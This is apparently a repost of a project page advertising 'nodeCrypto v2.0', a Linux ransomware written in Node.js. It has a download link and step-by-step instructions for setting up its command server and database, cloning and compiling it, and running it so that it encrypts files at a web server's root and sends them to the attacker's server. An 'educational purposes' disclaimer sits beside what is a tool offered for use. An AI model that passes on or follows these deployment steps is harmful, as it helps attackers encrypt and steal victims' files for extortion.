nodeCrypto v2.0 – Ransomware Written In NodeJs

nodeCrypto 3

nodeCrypt is a linux Ransomware written in NodeJs that encrypt predefined files.
This project was created for educational purposes, you are the sole responsible for the use of nodeCrypto.

Demo video

Install server
Upload all file of server/ folder on your webserver.
Create a sql database and import sql/nodeCrypto.sql
Edit server/libs/db.php and add your SQL ID.

Install and run
git clone https://github.com/atmoner/nodeCrypto.git
cd nodeCrypto && npm install
cd sources && npm install
cd .. && npm start
Once your configuration is complete, run compile!
You can start the ransomware.
cd sources && ./output
The files at the root of the web server will encrypt and send to the server.

Screenshot

nodeCrypto 3 1

nodeCrypto 4

nodeCrypto 5

Download nodeCrypto
Original Source